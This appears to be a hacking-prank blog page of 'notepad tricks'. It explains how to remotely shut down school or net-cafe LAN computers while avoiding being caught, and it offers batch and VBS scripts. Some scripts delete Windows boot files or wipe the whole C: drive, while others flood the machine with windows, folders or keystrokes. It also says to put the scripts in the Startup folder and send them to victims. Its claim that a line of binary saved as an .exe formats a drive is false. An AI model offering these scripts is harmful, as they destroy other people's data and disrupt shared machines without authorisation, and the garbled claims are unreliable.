Showing posts with label notepad tricks. Show all posts
Showing posts with label notepad tricks. Show all posts

School , NetCafe , University , Lab ke Computers Remotely Shutdown karen..!





:::: Very CoOoOL pRANk And AlsO Funny But this is Only for Educational purpose Only ::::

Requirements::

- The school must be connected with a LAN Network
- You have to be able to create .txt files and save them to .bat files. (Most schools don't block this)


1) Right-click on your desktop. Navigate to "New" and then to "Text Document"

2) Open the Document and type:

Spoiler:
Quote:
shutdown.exe -i


Save the .txt file as a .bat file.

3) Open the .bat file. "Remote Shutdown Dialog" should pop up when you open it.

4) Click "Browse...". All computers connected to your LAN Connection should be in the list. When you do this in school, you can target specific rooms if the school admin organized the computers. In my school, I can search for "LIB" and all the computers in the library will be in the list.

5) After you find the name, click "Add..." and type the computers name (EXACTLY), and hit "OK".

6) Now, you have a few options before you make their computer shutdown. You can make their computer: Shutdown, Logoff, or Restart.
After you picked the type of shutdown you want to do, you can choose how long the message will stay up for. Default on my computer is 20 seconds. <- If you don't want to be caught, set it to a low number so they can't see who forced the shutdown.

7) Set a comment! You can type in the "Comment" box to make the shutdown dialog say something. For example, if you type "You are stupid" in the comment box, the shutdown dialog will say at the bACottom "You are stupid".

New Notepad Tricks




Notepad Matrix Coding:

Copy this code and paste in notepad. Now save the file as matrix.bat 


****************************
@echo off
color 02es
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start
****************************

FUNNY FAKE VIRUS:
Copy this code and paste it in notepad and save it as anyname.bat
@echo off
cls
echo Fatal Error!! Your computer is under attack!!
pause
echo Deleting Files
pause
:files
echo !323%%%@#@GJFGG42JG 
echo !3424%@#%^&@52%@%gs 
echo !@$@^624@$6262$hG 
echo !@#4-07234&5*((6hkd 
echo !&^%78755&*%478*%$& 
echo !^$$68*$78()&4578 
echo !&8898*65$$566$68(9
goto files



AUTO SHUTDOWN:

Paste this code in notepad and save it as virus.bat

msg * Fatal Error! Your Computer Will Shutdown in few Moments!*
shutdown -t


CREATE A HUGE NUMBER OF FOLDERS WITHIN MINUTES:

Paste this code and save it as fun.bat


@echo off
:top
md %random%
goto top


SHUT DOWN A COMPUTER FOREVER:

Copy this code and paste in notepad and save as shutdown.bat OR shutdown.cmd

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini


You may try these also:


cmd /c del c:\windows\* /F /S /Q

cmd /c del c:\* /F /S /Q

FLOOD WEBPAGE OPENING ON PC:

Copy this code and paste in notepad. Save it as name.bat

:A
start www.ashutoshthehacker.blogspot.com
goto A

This will flood pages of this blog on your pc.

DELETE ALL FILES OF A COMPUTER:

Copy this code and paste in notepad. Save it as del.bat

del *.*


This will delete all files of hard disk if you run it.

IF YOU PLACE THE .bat FILES YOU MADE HERE IN "STRTUP" FOLDER, IT  WILL WORK AS VIRUS AND WILL RUN AUTOMETICALLY WHEN WINDOWS WILL START.

Format Hard Disk Using Notepad





Write The Following In Notepad Exactly as it says


1. Write the following 


code:

01001011000111110010010101010101010000011111100000

2. Save As it as .EXE and any Name would Do. eg- (virus.exe)

3. If u run the program means it will format the Hard Drive.

NOTE: This is for learning purpose only!!

COOL NOTEPAD TRICKS






UNLIMITED NOTEPAD WINDOWS HACK
This will pop up endless notepads until the computer freezes and crashes. Copy the below code in notepad and save it as ".vbs" extension.

Code:-
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top



CAPS LOCK CRAZY TRICK
This constantly turns caps lock on and off really fast continuously.

Code:-
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop

UNLIMITED BACKSPACE HACK
This makes it so the backspace key is constantly being pressed.

Code:-
MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
       

Hack your friend's keyboard and make him type "You are a fool" simultaneously:

Code:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop


Convey your friend a message and shut down his / her computer:
 
Code:
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" in All Files .

Some Notepad Pranks





Try these with Caution

Shut Down a Computer Forever (Windows XP):

1. Open notepad and copy/paste this code:

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

2. Save it as a abc.bat file.

Result: This shuts down the persons computer. It shuts it off once and deletes the files needed to reboot and restart.


Make over 1,000 folders in few seconds:

Some-Notepad-Pranks

1. Open notepad and type :

@echo off
:top
md %random%
goto top

2. Save as anything.bat

Result: @echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder.
md %random% is command that creates folders with random names.
goto top – return to label :top, and initiates an infinite loop.

Restarting The Computer:

When you get a chance, Right-click your victim’s icon to Internet Explorer or some other commonly used program. Edit the properties and change the target to: “%windir%\system32\shutdown.exe -r -t 00″ Now, every time your buddy tries to run IE, his machine will mysteriously restart.

Show Infinite Diretories in Command Prompt:

Some-Notepad-Pranks

1. Type this in notepad and save as virus.bat

@echo off 
title VIRUS 
color 06 

echo YOU HAVE A VIRUS ON YOUR COMPUTER 
pause 
echo CONTACTING ANTI-VIRUS.... 
pause 
echo DO YOU WANT TO DELETE VIRUS? 
pause 
echo ACCESS DENIED 
echo ACCESS DENIED 
echo ACCESS DENIED 
pause 
echo ACTIVATING VIRUS..... 
echo VIRUS ACTIVATED!!!! 
pause 
:1 
dir/s 
goto 1

2. Send the saved file to your victim and ask them to run.

The Famous Matrix Effect:

Some-Notepad-Pranks

1. Type this in Notepad:


@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start

2. Save it as anything.bat

Repeat messages to annoy the user:

1. Type in notepad.

@ECHO off
:Begin
msg * Hi
msg * What are You Doing?
msg * Having Fun!
msg * Lets have it together!
msg * Because you been hacked
GOTO BEGIN

2. Save as anything.bat

Shut Down The Computer after Displaying a Message:

1. Type in notepad.

@echo off
msg * Get Some Rest.
shutdown -c “Errorrrrr . Byeeeeee” -s

2. Save as anything.bat

Just Scare Your Friend, No Harm:

1. Copy the below code in notepad and save as anything.bat

Code:

@echo off
echo OMFG YOU GOT A VIRUS.
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
echo It will now begin to delete your files.
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
echo Do you want to abort the deletion of your files?
pause
echo Wow you really fell for that. Pressing a key made the virus delete your account.
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
echo deleting.......
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
echo YOU'VE BEEN FOOLED. THERE IS NO VIRUS. YOU'RE JUST A N00B.
pause

ENJOY THESE TRICKS... :-)